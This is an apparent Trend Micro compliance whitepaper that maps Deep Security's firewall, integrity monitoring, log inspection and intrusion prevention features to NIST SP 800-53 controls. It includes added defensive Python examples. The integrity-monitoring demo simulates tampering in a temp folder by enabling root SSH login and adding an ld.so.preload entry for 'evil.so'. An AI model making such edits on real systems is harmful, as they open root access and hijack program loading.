1. The CC evaluation Security Targets also included Trend Micro product-specific Security Functional Requirements (SFRs) and Security Assurance Requirements (SARs) related to Intrusion Detection and Anti-Malware. These SFRs and SARs are not included in the SP 800-53 r4 Appendix H mapping table.
2. The current Common Criteria evaluation of Deep Security v9.5 is an update to the earlier evaluations to EAL4+ for Deep Security v7.5 SP2 (Certification Report #383-4-152) and for Deep Security v8.0 SP1 (Maintenance Report #383-7-79-MR).
Document TMIC-004-N Version 2.0, September 2015 2
One of the major challenges for government enterprises and their service providers is to remain compliant with the SP 800-53 standard in a constantly changing threat environment. One objective of this Trend Micro document is to provide focused guidance on how Trend Micro Deep Security can help deal with these ongoing challenges. The SP 800-53 security control baselines and priorities are leveraged to provide that focus. This prioritized approach identifies the applicable SP 800-53 security control baselines (L, M and H) and the implementation priorities (P0, P1, P2 and P3). These details help enterprises and their service provider partners implement a continuous improvement process to protect critical assets and data against the highest risk factors and today's escalating threats. The reader is also referred to the above-referenced Trend Micro whitepaper for additional guidance on virtualization implementation.
The Deep Security product provides, in both virtualized and physical environments, the combined functionality of a Common Criteria EAL2 validated Firewall,
Anti-Virus, Deep Packet Inspection, Integrity Monitoring, Log Inspection, Role Based Access Control (RBAC) and support for multi-tenant virtual environments.
The primary Deep Security modules include:
Deep Security Manager is a centralized Web-based management console which administrators use to configure security policy and deploy protection to the enforcement
components: the Deep Security Virtual Appliance and the Deep Security Agent.
Firewall Module centralizes management of server firewall policy using a bidirectional stateful firewall. Supports virtual machine zoning and prevents denial of service
attacks. Provides broad coverage for all IP-based protocols and frame types as well as fine-grained filtering for ports and IP and MAC addresses.
Anti-malware Module provides both real-time and on-demand protection against file-based threats, including threats commonly referred to as malware, viruses, Trojans,
and spyware. To identify threats, Anti-Malware checks files against a comprehensive threat database, portions of which are hosted on servers or kept locally as updatable
patterns. Anti-Malware also checks files for certain characteristics, such as compression and known exploit code. To address threats, Anti-Malware selectively performs
actions that contain and remove the threats while minimizing system impact. Anti-Malware can clean, delete, or quarantine malicious files. It can also terminate processes
and delete other system objects that are associated with identified threats.
Recommendation Scans identify known vulnerabilities. The operation scans the operating system and the installed applications. Recommendation Scans automate the scanning of systems and patch levels against the latest Common Vulnerabilities and Exposures (CVE) database, automatically apply Deep Security signatures, engines, patterns, and rules/filters to detect/prevent exploitation of these vulnerabilities, and produce audit logs and reports which can be used to support a continuous monitoring program or audits.
Integrity Monitoring Module detects and reports malicious and unexpected changes to files and the system registry in real time, and is available in an agentless form factor. Provides administrators with the ability to track both authorized and unauthorized changes made to the instance. The ability to detect unauthorized changes is a critical component of a cloud security strategy, as it provides visibility into changes that could indicate the compromise of an instance.
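The baseline-and-compare mechanism described above can be illustrated with a small script. This is an added example written for this page, not Deep Security code: it records a SHA-256, mode and owner for each monitored file, then reports created, deleted, modified and attribute-only changes against that baseline. The file names, their contents and the tampering performed in demo() are constructed for the example.

```python
"""File-integrity baseline and comparison (added example, not Deep Security code)."""
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

Fingerprint = Dict[str, object]
Event = Tuple[str, str, str]   # (path, event kind, detail)


def fingerprint(path: str) -> Fingerprint:
    """Attributes an integrity monitor tracks for one file: content hash, mode, owner."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid}


def build_baseline(paths: List[str]) -> Dict[str, Fingerprint]:
    """Snapshot every monitored path that currently exists as a regular file."""
    return {p: fingerprint(p) for p in paths if os.path.isfile(p)}


def compare(baseline: Dict[str, Fingerprint], current: Dict[str, Fingerprint]) -> List[Event]:
    """Diff two snapshots. A content change is 'modified'; a mode or owner change
    with identical content (for example a chmod) is 'attributes'."""
    events: List[Event] = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old is None:
            events.append((path, "created", str(new["sha256"])))
        elif new is None:
            events.append((path, "deleted", str(old["sha256"])))
        elif old["sha256"] != new["sha256"]:
            events.append((path, "modified", f"{str(old['sha256'])[:12]} -> {str(new['sha256'])[:12]}"))
        elif old["mode"] != new["mode"] or old["uid"] != new["uid"]:
            events.append((path, "attributes", f"mode {old['mode']:o} -> {new['mode']:o}"))
    return events


def demo() -> List[Event]:
    """Constructed scenario: baseline three files, then tamper with the set."""
    root = tempfile.mkdtemp()
    paths = [os.path.join(root, n) for n in ("sshd_config", "passwd", "cron.allow")]
    for p in paths:
        with open(p, "w") as fh:
            fh.write(f"# original {os.path.basename(p)}\n")
    os.chmod(paths[2], 0o644)
    baseline = build_baseline(paths)

    # Simulated unauthorized changes after the baseline was taken.
    with open(paths[0], "a") as fh:
        fh.write("PermitRootLogin yes\n")        # content change
    os.chmod(paths[2], 0o666)                    # permissions loosened, content intact
    os.remove(paths[1])                          # file removed
    rogue = os.path.join(root, "ld.so.preload")  # file added
    with open(rogue, "w") as fh:
        fh.write("/tmp/evil.so\n")

    return compare(baseline, build_baseline(paths + [rogue]))


if __name__ == "__main__":
    for path, kind, detail in demo():
        print(f"{kind:10s} {os.path.basename(path):15s} {detail}")
```

Separating content changes from attribute-only changes matters in practice: a permission change on an unchanged file is exactly the kind of event a hash-only monitor misses, and a real deployment would also cover the registry, services and listening ports listed later in this document.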
Log Inspection Module provides visibility into important security events buried in log files. Optimizes the identification of important security events buried in multiple log entries across the data center. Forwards suspicious events to a SIEM system or centralized logging server for correlation, reporting and archiving. Leverages and enhances the open-source OSSEC software.
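As an added illustration of log inspection (example code written for this page, not Trend Micro's or OSSEC's implementation), the engine below decodes sshd lines from a syslog-format auth log, matches them against a few atomic rules, escalates repeated failures from one source with a frequency rule, and renders each hit as a key=value record a syslog collector or SIEM could ingest. The rule numbers borrow OSSEC's sshd numbering for familiarity; the patterns, the year assumed for the year-less syslog timestamps, and the sample log lines are constructed for the example.

```python
"""Log-inspection rule engine (added example; not Trend Micro or OSSEC code)."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

LOG_YEAR = 2015   # assumption: classic syslog timestamps carry no year

HEADER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: (?P<msg>.*)$")
FIELDS_RE = re.compile(
    r"(?:for (?:invalid user )?(?P<user>\S+) )?from (?P<srcip>\d{1,3}(?:\.\d{1,3}){3})")


def decode(line: str) -> Optional[Dict[str, object]]:
    """Split a syslog-format sshd line into timestamp, host, message, user and source IP."""
    m = HEADER_RE.match(line)
    if not m:
        return None
    ev: Dict[str, object] = dict(m.groupdict())
    ev["time"] = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    f = FIELDS_RE.search(m["msg"])
    ev["user"] = f["user"] if f else None
    ev["srcip"] = f["srcip"] if f else None
    return ev


# Atomic rules are tried in order; the first match wins.
ATOMIC_RULES = [
    {"id": 5710, "level": 5, "pattern": r"invalid user",
     "desc": "sshd: attempt to login using a non-existent user"},
    {"id": 5716, "level": 5, "pattern": r"^Failed password",
     "desc": "sshd: authentication failed"},
    {"id": 5715, "level": 3, "pattern": r"^Accepted (?:password|publickey)",
     "desc": "sshd: authentication success"},
]
# Composite rule: `frequency` hits of any parent rule from one srcip inside `timeframe` seconds.
FREQ_RULE = {"id": 5720, "level": 10, "parents": {5710, 5716}, "frequency": 4,
             "timeframe": 120, "desc": "sshd: multiple authentication failures (brute force)"}


class LogInspector:
    def __init__(self) -> None:
        self._hits: Dict[str, Deque[datetime]] = defaultdict(deque)  # srcip -> parent-hit times

    def inspect(self, line: str) -> List[Dict[str, object]]:
        ev = decode(line)
        if ev is None:
            return []
        for rule in ATOMIC_RULES:
            if re.search(str(rule["pattern"]), str(ev["msg"])):
                alerts = [self._alert(rule, ev)]
                if rule["id"] in FREQ_RULE["parents"] and ev["srcip"]:
                    alerts.extend(self._frequency(ev))
                return alerts
        return []

    def _frequency(self, ev: Dict[str, object]) -> List[Dict[str, object]]:
        q = self._hits[str(ev["srcip"])]
        now = ev["time"]
        q.append(now)
        while q and (now - q[0]).total_seconds() > FREQ_RULE["timeframe"]:
            q.popleft()                       # forget hits outside the sliding window
        if len(q) >= FREQ_RULE["frequency"]:
            q.clear()                         # fire once per burst, then count afresh
            return [self._alert(FREQ_RULE, ev)]
        return []

    @staticmethod
    def _alert(rule: Dict[str, object], ev: Dict[str, object]) -> Dict[str, object]:
        return {"rule_id": rule["id"], "level": rule["level"], "host": ev["host"],
                "srcip": ev["srcip"], "user": ev["user"], "desc": rule["desc"]}


def to_siem_record(alert: Dict[str, object]) -> str:
    """Flat key=value line of the kind forwarded over syslog to a SIEM."""
    parts = []
    for k, v in alert.items():
        if v is None:
            continue
        s = str(v)
        parts.append(f'{k}="{s}"' if " " in s else f"{k}={s}")
    return " ".join(parts)


# Constructed sample: a burst of failures from one address and one success from another.
SAMPLE_LOG = """\
Sep 14 10:01:02 web01 sshd[2201]: Failed password for root from 203.0.113.9 port 51022 ssh2
Sep 14 10:01:05 web01 sshd[2203]: Failed password for invalid user admin from 203.0.113.9 port 51030 ssh2
Sep 14 10:01:07 web01 sshd[2205]: Accepted publickey for deploy from 198.51.100.4 port 40110 ssh2
Sep 14 10:01:09 web01 sshd[2207]: Failed password for root from 203.0.113.9 port 51041 ssh2
Sep 14 10:01:12 web01 sshd[2209]: Failed password for root from 203.0.113.9 port 51050 ssh2
Sep 14 10:01:13 web01 sshd[2210]: Received disconnect from 203.0.113.9 port 51050:11: Bye Bye
"""


def run(log_text: str = SAMPLE_LOG) -> List[Dict[str, object]]:
    inspector = LogInspector()
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        alerts.extend(inspector.inspect(line))
    return alerts


if __name__ == "__main__":
    for a in run():
        print(to_siem_record(a))
```

The frequency rule is what turns four individually low-severity lines into one level-10 event worth forwarding; a collector that only ships raw lines leaves that correlation to the SIEM, whereas doing it on the host keeps the forwarded volume small.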
Intrusion Prevention Module is both an Intrusion Detection System (IDS) and an Intrusion Prevention System (IPS) which protects computers from exploitation of known and zero-day vulnerabilities as well as from SQL injection attacks, cross-site scripting attacks, and other web application vulnerabilities. It shields vulnerabilities until code fixes can be completed, identifies malicious software accessing the network, and increases visibility into, or control over, applications accessing the network. Intrusion Prevention prevents attacks by detecting malicious instructions in network traffic and dropping the relevant packets.
Web Reputation Module protects against web threats by blocking access to malicious URLs. Deep Security uses Trend Micro's Web security databases from Smart
Protection Network sources to check the reputation of Web sites that users are attempting to access. The Web site's reputation is correlated with the specific Web
reputation policy enforced on the computer. Depending on the Web Reputation Security Level being enforced, Deep Security will either block or allow access to the URL.
AU-6 (1) Audit Review, Analysis, and Reporting / Process Integration
Priority & Baselines: P1; M, H; CNSSI; FedRAMP
Control: The organization employs automated mechanisms to integrate audit review, analysis, and reporting processes to support organizational processes for investigation and response to suspicious activities.
Supplemental Guidance: Organizational processes benefiting from integrated audit review, analysis, and reporting include, for example, incident response, continuous monitoring, contingency planning, and Inspector General audits. Related controls: AU-12, PM-7.
Trend Micro Solution Compliancy: Deep Security Recommendation Scans support this requirement by allowing organizations to automate scanning of systems and patch levels against the latest Common Vulnerabilities and Exposures (CVE) database, to automatically apply Deep Security rules/filters to detect/prevent exploitation of these vulnerabilities, and to produce audit logs and reports which can be used to support a continuous monitoring program or audits.
AU-6 (5) Audit Review, Analysis, and Reporting / Integration / Scanning and Monitoring Capabilities
Priority & Baselines: P1; H; CNSSI
Control: The organization integrates analysis of audit records with analysis of [Selection (one or more): vulnerability scanning information; performance data; information system monitoring information; [Assignment: organization-defined data/information collected from other sources]] to further enhance the ability to identify inappropriate or unusual activity.
Supplemental Guidance: This control enhancement does not require vulnerability scanning, the generation of performance data, or information system monitoring. Rather, the enhancement requires that the analysis of information being otherwise produced in these areas is integrated with the analysis of audit information. Security Event and Information Management System tools can facilitate audit record aggregation/consolidation from multiple information system components as well as audit record correlation and analysis. The use of standardized audit record analysis scripts developed by organizations (with localized script adjustments, as necessary) provides more cost-effective approaches for analyzing audit record information collected. The correlation of audit record information with vulnerability scanning information is important in determining the veracity of vulnerability scans and correlating attack detection events with scanning results. Correlation with performance data can help uncover denial of service attacks or cyber-attacks resulting in unauthorized use of resources. Correlation with system monitoring information can assist in uncovering attacks and in better relating audit information to operational situations. Related controls: AU-12, IR-4, RA-5.
Trend Micro Solution Compliancy: Deep Security supports the ability to centrally review and correlate audit data with threat detection (scanning and monitoring) data by providing interfaces to either a syslog server or direct input to a SIEM system, to enhance the ability to identify inappropriate or unusual activity. The Deep Security Log Inspection capability provides scanning and visibility into important security events buried in log files, and creates audit trails of administrator activity. It optimizes the identification of important security events buried in multiple log entries across the data center, and forwards suspicious events to a SIEM system or centralized logging server for correlation, reporting and archiving.
CM-2 (6) Configuration Management / Baseline Configuration / Development and Test Environments
Control: The organization maintains a baseline configuration for information system development and test environments that is managed separately from the operational baseline configuration.
Supplemental Guidance: Establishing separate baseline configurations for development, testing, and operational environments helps protect information systems from unplanned/unexpected events related to development and testing activities. Separate baseline configurations allow organizations to apply the configuration management that is most appropriate for each type of configuration. For example, management of operational configurations typically emphasizes the need for stability, while management of development/test configurations requires greater flexibility. Configurations in the test environment mirror the configurations in the operational environment to the extent practicable so that the results of the testing are representative of the proposed changes to the operational systems. This control enhancement requires separate configurations but not necessarily separate physical environments. Related controls: CM-4, SC-3, SC-7.
Trend Micro Solution Compliancy: The Deep Security solution supports satisfying this requirement through Integrity Monitoring, which compares the current condition of a monitored object with an existing baseline. Integrity Monitoring monitors critical system objects such as files, folders, registry entries, processes, services, and listening ports, and can assist in developing a system's baseline configuration and in notifying administrators of any modifications to it.
CM-6 Configuration Management / Configuration Settings
Priority & Baselines: P1; L, M, H; CNSSI; FedRAMP
Control: The organization:
a) Establishes and documents configuration settings for information technology products employed within the information system using [Assignment: organization-defined security configuration checklists] that reflect the most restrictive mode consistent with operational requirements;
b) Implements the configuration settings;
c) Identifies, documents, and approves any deviations from established configuration settings for [Assignment: organization-defined information system components] based on [Assignment: organization-defined operational requirements]; and
d) Monitors and controls changes to the configuration settings in accordance with organizational policies and procedures.
Supplemental Guidance: Configuration settings are the set of parameters that can be changed in hardware, software, or firmware components of the information system that affect the security posture and/or functionality of the system. Information technology products for which security-related configuration settings can be defined include, for example, mainframe computers, servers (e.g., database, electronic mail, authentication, web, proxy, file, domain name), workstations, input/output devices (e.g., scanners, copiers, and printers), network components (e.g., firewalls, routers, gateways, voice and data switches, wireless access points, network appliances, sensors), operating systems, middleware, and applications. Security-related parameters are those parameters impacting the security state of information systems including the parameters required to satisfy other security control requirements. Security-related parameters include, for example: (i) registry settings; (ii) account, file, directory permission settings; and (iii) settings for functions, ports, protocols, services, and remote connections. Organizations establish organization-wide configuration settings and subsequently derive specific settings for information systems. The established settings become part of the systems configuration baseline. Common secure configurations (also referred to as security configuration checklists, lockdown and hardening guides, security reference guides, security technical implementation guides) provide recognized, standardized, and established benchmarks that stipulate secure configuration settings for specific information technology platforms/products and instructions for configuring those information system components to meet operational requirements. Common secure configurations can be developed by a variety of organizations including, for example, information technology product developers, manufacturers, vendors, consortia, academia, industry, federal agencies, and other organizations in the public and private sectors. Common secure configurations include the United States Government Configuration Baseline (USGCB) which affects the implementation of CM-6 and other controls such as AC-19 and CM-7. The Security Content Automation Protocol (SCAP) and the defined standards within the protocol (e.g., Common Configuration Enumeration) provide an effective method to uniquely identify, track, and control configuration settings. OMB establishes federal policy on configuration requirements for federal information systems. Related controls: AC-19, CM-2, CM-3, CM-7, SI-4.
Trend Micro Solution Compliancy: The Deep Security solution supports satisfying this requirement through the Integrity Monitoring functionality, which alerts an administrator of a physical or virtualized environment to modifications of critical security configuration objects. In addition, within the virtualized environment the Deep Security solution has introduced hypervisor integrity monitoring utilizing Intel TPM/TXT technology to monitor whether the hypervisor is compromised.
The Recommendation Scanning function that exists within Deep Security Manager also supports compliance with this requirement, by creating default policies that can be automatically assigned to a new server when it comes online and by allowing the system to automatically assign security configuration to existing servers. The goal is to automate configuration of hosts and assign the security policies required to protect that server/host.
As additional information, Deep Security can run Recommendation Scans on computers to identify known vulnerabilities. The operation scans the operating system and installed applications. Based on what is detected, Deep Security will recommend security Rules that should be applied. During a Recommendation Scan, Deep Security Agents scan:
- the operating system,
- installed applications,
- the Windows registry,
- open ports,
- the directory listing,
- the file system,
- running processes and services, and
- users.
For large deployments, Trend Micro recommends managing Recommendations at the Policy level. That is, all computers that are to be scanned should already have a Policy assigned to them. This way, an organization can make all rule assignments from a single source (the Policy) rather than having to manage individual rules on individual computers.
Recommendation Scans can be initiated manually or can be run as a Scheduled Task to periodically scan specified computers.
NIST SP 800-53 r4 Control | Priority & Baselines | Trend Micro Solution Compliancy
CM-6 (1) Configuration Management / Configuration Settings / Automated Central Management / Application / Verification
Priority & Baselines: P1; H; CNSSI; FedRAMP
Control: The organization employs automated mechanisms to centrally manage, apply, and verify configuration settings for [Assignment: organization-defined information system components].
Supplemental Guidance: Related controls: CA-7, CM-4.
Trend Micro Solution Compliancy: Deep Security supports this requirement through the Integrity Monitoring functionality, which alerts an administrator of a physical or virtualized environment to modifications of critical security configuration objects. Recommendation Scans also support this requirement by allowing organizations to automate scanning of systems and patch levels against the latest Common Vulnerabilities and Exposures (CVE) database, and to automatically apply Deep Security rules/filters to detect/prevent exploitation of the identified vulnerabilities.
CP-2 Contingency Planning / Contingency Plan
CP-2 (6) Contingency Plan / Alternate Processing / Storage Site
Control: The organization plans for the transfer of essential missions and business functions to alternate processing and/or storage sites with little or no loss of operational continuity and sustains that continuity through information system restoration to primary processing and/or storage sites.
Supplemental Guidance: Organizations may choose to carry out the contingency planning activities in this control enhancement as part of organizational business continuity planning including, for example, as part of business impact analyses. Primary processing and/or storage sites defined by organizations as part of contingency planning may change depending on the circumstances associated with the contingency (e.g., backup sites may become primary sites). Related control: PE-12.
Trend Micro Solution Compliancy: Deep Security supports satisfying this requirement, specifically in the virtual environment, through Deep Security policies, rules and filters, which remain linked to Virtual Machines as they are moved to alternate processing or storage sites; this ensures the security remains intact after the VM move. The Recommendation Scanning function that exists within Deep Security Manager also supports compliance with this requirement, by creating default policies that can be automatically assigned to a new server when it comes online and by allowing the system to automatically assign security configuration to existing servers. The goal is to automate configuration of hosts and assign the security policies (rules) required to protect that server/host.
IR-4 (2) Incident Handling / Dynamic Reconfiguration
Control: The organization includes dynamic reconfiguration of [Assignment: organization-defined information system components] as part of the incident response capability.
Supplemental Guidance: Dynamic reconfiguration includes, for example, changes to router rules, access control lists, intrusion detection/prevention system parameters, and filter rules for firewalls and gateways. Organizations perform dynamic reconfiguration of information systems, for example, to stop attacks, to misdirect attackers, and to isolate components of systems, thus limiting the extent of the damage from breaches or compromises. Organizations include time frames for achieving the reconfiguration of information systems in the definition of the reconfiguration capability, considering the potential need for rapid response in order to effectively address sophisticated cyber threats. Related controls: AC-2, AC-4, AC-16, CM-2, CM-3, CM-4.
Trend Micro Solution Compliancy: Deep Security supports this requirement through its support of VMware NSX, by tagging infected virtual machines so that they can be automatically quarantined.
IR-4 (9) Incident Handling / Dynamic Response Capability
Control: The organization employs [Assignment: organization-defined dynamic response capabilities] to effectively respond to security incidents.
Supplemental Guidance: This control enhancement addresses the deployment of replacement or new capabilities in a timely manner in response to security incidents (e.g., adversary actions during hostile cyber attacks). This includes capabilities implemented at the mission/business process level (e.g., activating alternative mission/business processes) and at the information system level. Related control: CP-10.
Trend Micro Solution Compliancy: Deep Security Recommendation Scans support this requirement by allowing organizations to automate scanning of systems and patch levels against the latest Common Vulnerabilities and Exposures (CVE) database, to automatically apply Deep Security rules/filters to detect/prevent exploitation of these vulnerabilities, and to produce audit logs and reports which can be used to support a continuous monitoring program or audits.
Deep Security also supports this requirement through its support of VMware NSX, by tagging infected virtual machines so that they can be automatically quarantined.
IR-5 Incident Response / Monitoring
IR-5 Incident Monitoring
Priority & Baselines: P1; L, M, H; CNSSI
Control: The organization tracks and documents information system security incidents.
Supplemental Guidance: Documenting information system security incidents includes, for example, maintaining records about each incident, the status of the incident, and other pertinent information necessary for forensics, evaluating incident details, trends, and handling. Incident information can be obtained from a variety of sources including, for example, incident reports, incident response teams, audit monitoring, network monitoring, physical access monitoring, and user/administrator reports. Related controls: AU-6, IR-8, PE-6, SC-5, SC-7, SI-3, SI-4, SI-7.
Trend Micro Solution Compliancy: Deep Security Manager supports this control through its ability to produce and distribute incident data and reports as required by an organization's policies, and through Trend Micro Control Manager, which can track and distribute the reporting of security incidents detected by Deep Security.
IR-5 (1) Incident Monitoring / Automated Tracking / Data Collection / Analysis
Priority & Baselines: P1; H; CNSSI
Control: The organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information.
Supplemental Guidance: Automated mechanisms for tracking security incidents and collecting/analyzing incident information include, for example, the Einstein network monitoring device and monitoring online Computer Incident Response Centers (CIRCs) or other electronic databases of incidents. Related controls: AU-7, IR-4.
Trend Micro Solution Compliancy: Within the Trend Micro services, the Smart Protection Network uses a global network of threat intelligence sensors to continually update email, web, and file reputation databases in the cloud, identifying and blocking threats in real time before they reach the organization.
Deep Security Manager supports this control through its ability to automatically produce and distribute incident data and reports as required by an organization's policies, and through Trend Micro Control Manager, which can track and distribute the reporting of security incidents detected by Deep Security.
SC-7 (11) System and Communications Protection / Boundary Protection / Restrict Incoming Communications Traffic
Priority & Baselines: CNSSI
Control: The information system only allows incoming communications from [Assignment: organization-defined authorized sources] routed to [Assignment: organization-defined authorized destinations].
Supplemental Guidance: This control enhancement provides determinations that source and destination address pairs represent authorized/allowed communications. Such determinations can be based on several factors including, for example, the presence of source/destination address pairs in lists of authorized/allowed communications, the absence of address pairs in lists of unauthorized/disallowed pairs, or meeting more general rules for authorized/allowed source/destination pairs. Related control: AC-3.
Trend Micro Solution Compliancy: The Deep Security Firewall rules examine the control information of network packets and determine whether a network connection should be allowed. Stateful Configuration filters analyze each network packet in the context of traffic history, correctness of TCP and IP header values, and TCP connection state transitions, and manage existing network sessions efficiently.
Virtual machine isolation: allows VMs to be isolated virtual environments, providing virtual segmentation without the need to modify virtual switch configurations or network architecture.
Fine-grained filtering: firewall rules filter traffic based on source and destination IP address, port, MAC address, etc. Different rules can be applied to different network interfaces. For end-user systems, the firewall is location aware and is able to limit interface use such that only a single interface can be used at one time.
Security Profiles provide a logical way of replicating security settings to physical or virtual servers or machines that share similar security requirements.
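To make the firewall behaviour concrete (the stateful inspection and source/destination allow-listing described for the Firewall Module and for SC-7 (11) above), here is an added example, not Deep Security code: a toy stateful TCP filter that rejects flag combinations no legitimate stack sends, admits a new inbound connection only when a rule allows the source/destination pair and port, and thereafter admits packets only if they belong to a tracked session in a state that makes them plausible. The rules, addresses and packet sequence are constructed for the example.

```python
"""Stateful packet filter sketch (added example; not Deep Security code)."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10   # TCP flag bits


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: int
    ttl: int = 64


@dataclass(frozen=True)
class Rule:
    src_net: str    # CIDR; "0.0.0.0/0" means any source
    dst_net: str
    dport: int      # 0 means any destination port
    action: str     # "allow" or "deny"


Key = Tuple[str, int, str, int]   # initiator's (src, sport, dst, dport)


class StatefulFirewall:
    def __init__(self, rules: List[Rule]) -> None:
        self.rules = [(ip_network(r.src_net), ip_network(r.dst_net), r.dport, r.action) for r in rules]
        self.sessions: Dict[Key, str] = {}   # initiator 4-tuple -> syn_sent | syn_received | established

    @staticmethod
    def header_valid(p: Packet) -> bool:
        """Header correctness: reject values and flag combinations a real stack never emits."""
        if not (0 < p.sport < 65536 and 0 < p.dport < 65536 and p.ttl > 0):
            return False
        if p.flags & SYN and p.flags & FIN:      # SYN+FIN probes
            return False
        if not p.flags & (SYN | ACK | RST):      # NULL and bare-FIN scans
            return False
        return True

    def policy(self, p: Packet) -> str:
        """First matching source/destination/port rule wins; default deny."""
        src, dst = ip_address(p.src), ip_address(p.dst)
        for src_net, dst_net, dport, action in self.rules:
            if src in src_net and dst in dst_net and dport in (0, p.dport):
                return action
        return "deny"

    def filter(self, p: Packet) -> str:
        """Return 'allow' or 'drop', updating the session table as the handshake progresses."""
        if not self.header_valid(p):
            return "drop"
        fwd: Key = (p.src, p.sport, p.dst, p.dport)
        rev: Key = (p.dst, p.dport, p.src, p.sport)
        if fwd in self.sessions:                          # initiator -> responder
            state = self.sessions[fwd]
            if p.flags & RST:
                del self.sessions[fwd]
            elif state == "syn_received" and p.flags & ACK:
                self.sessions[fwd] = "established"
            elif state == "syn_sent" and not p.flags & SYN:
                return "drop"                             # only a SYN retransmit is valid here
            return "allow"
        if rev in self.sessions:                          # responder -> initiator
            state = self.sessions[rev]
            if p.flags & RST:
                del self.sessions[rev]
            elif state == "syn_sent":
                if (p.flags & (SYN | ACK)) != (SYN | ACK):
                    return "drop"                         # handshake must answer with SYN+ACK
                self.sessions[rev] = "syn_received"
            return "allow"
        # Unknown packet: only a bare SYN may open a session, and only if policy permits it.
        if (p.flags & (SYN | ACK)) != SYN:
            return "drop"
        if self.policy(p) != "allow":
            return "drop"
        self.sessions[fwd] = "syn_sent"
        return "allow"


def scenario() -> Tuple[StatefulFirewall, List[str]]:
    """Constructed traffic: a permitted HTTPS handshake, an ACK scan, a disallowed SSH
    attempt, a SYN+FIN probe, an outbound web connection with its reply, and a NULL packet."""
    fw = StatefulFirewall([
        Rule("198.51.100.0/24", "10.0.0.5/32", 443, "allow"),   # partner range -> web server
        Rule("10.0.0.0/8", "0.0.0.0/0", 0, "allow"),            # internal hosts may initiate outbound
    ])
    packets = [
        Packet("198.51.100.7", 40000, "10.0.0.5", 443, SYN),
        Packet("10.0.0.5", 443, "198.51.100.7", 40000, SYN | ACK),
        Packet("198.51.100.7", 40000, "10.0.0.5", 443, ACK),
        Packet("203.0.113.9", 5555, "10.0.0.5", 443, ACK),        # ACK with no session
        Packet("203.0.113.9", 5556, "10.0.0.5", 22, SYN),         # source not in allow-list
        Packet("203.0.113.9", 5557, "10.0.0.5", 443, SYN | FIN),  # impossible flag combination
        Packet("10.0.0.5", 50000, "203.0.113.50", 80, SYN),
        Packet("203.0.113.50", 80, "10.0.0.5", 50000, SYN | ACK), # return traffic of outbound session
        Packet("203.0.113.9", 5558, "10.0.0.5", 443, 0),          # NULL packet
    ]
    return fw, [fw.filter(p) for p in packets]


if __name__ == "__main__":
    _, decisions = scenario()
    print(decisions)
```

The point the example makes is that the allow-list is consulted only for the packet that opens a session; every later packet is judged against the connection table, which is what lets return traffic for an outbound connection through without an inbound rule and what makes a stray ACK or a malformed probe fall on the floor.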
SC-7 (12) System and Communications Protection / Boundary Protection / Host-Based Protection
Priority & Baselines: CNSSI; FedRAMP
Control: The organization implements [Assignment: organization-defined host-based boundary protection mechanisms] at [Assignment: organization-defined information system components].
Supplemental Guidance: Host-based boundary protection mechanisms include, for example, host-based firewalls. Information system components employing host-based boundary protection mechanisms include, for example, servers, workstations, and mobile devices.
Trend Micro Solution Compliancy: The Deep Security solution provides host-based boundary protection through the host stateful inspection firewall, through host deep packet inspection, and through web reputation services. This can be implemented at the server or workstation level in physical or virtual environments.
SC-7 (16) System and Communications Protection / Boundary Protection / Prevent Discovery of Components / Devices
Control: The information system prevents discovery of specific system components composing a managed interface.
Supplemental Guidance: This control enhancement protects network addresses of information system components that are part of managed interfaces from discovery through common tools and techniques used to identify devices on networks. Network addresses are not available for discovery (e.g., network address not published or entered in domain name systems), requiring prior knowledge for access. Another obfuscation technique is to periodically change network addresses.
Trend Micro Solution Compliancy: The Deep Security solution, through its "Reconnaissance Detection" functionality, can determine and advise if an external entity is attempting to discover specific system components or weaknesses associated with them.
Smart rules provide broad protection, and low-level insight, for servers and end-user systems. For operating systems and applications, the rules limit variations of elements of traffic, limiting the ability of attackers to investigate possible attack vectors, since many attacks are based on exceeding expected characteristics. For servers and end-user systems, smart rules also provide insight into application activity and unexpected traffic (HTTP on an unexpected port, use of a web browser on a server, etc.).
SC-7 (17) System and Communications Protection / Boundary Protection / Automated Enforcement of Protocol Formats
Control: The information system enforces adherence to protocol formats.
Supplemental Guidance: Information system components that enforce protocol formats include, for example, deep packet inspection firewalls and XML gateways. Such system components verify adherence to protocol formats/specifications (e.g., IEEE) at the application layer and identify significant vulnerabilities that cannot be detected by devices operating at the network or transport layers. Related control: SC-4.
Trend Micro Solution Compliancy: The Deep Packet Inspection module is available in both the Deep Security Agent and the Deep Security Virtual Appliance for VMware ESX/ESXi. Deep Packet Inspection provides an automated IDS/IPS capability, which protects operating systems, commercial off-the-shelf applications, and custom web applications against attacks such as SQL injection and cross-site scripting. Security updates that provide protection against newly discovered vulnerabilities are automatically delivered to host machines. Detailed event records are produced, which provide valuable information, including the source of the attack, the time, and what the potential intruder was attempting to exploit.
SC-7 (19) System and Communications Protection / Boundary Protection / Blocks Communication From Non-Organizationally Configured Hosts
Control: The information system blocks both inbound and outbound communications traffic between [Assignment: organization-defined communication clients] that are independently configured by end users and external service providers.
Supplemental Guidance: Communication clients independently configured by end users and external service providers include, for example, instant messaging clients. Traffic blocking does not apply to communication clients that are configured by organizations to perform authorized functions.
Trend Micro Solution Compliancy: The Deep Security Firewall Rules examine the control information of network packets and determine whether a network connection should be allowed. Stateful Configuration filters analyze each network packet in the context of traffic history, correctness of TCP and IP header values, and TCP connection state transitions, and manage existing network sessions efficiently.
SC-7 (20) System and Communications Protection / Boundary Protection / Dynamic Isolation / Segregation
Control: The information system provides the capability to dynamically isolate/segregate [Assignment: organization-defined information system components] from other components of the system.
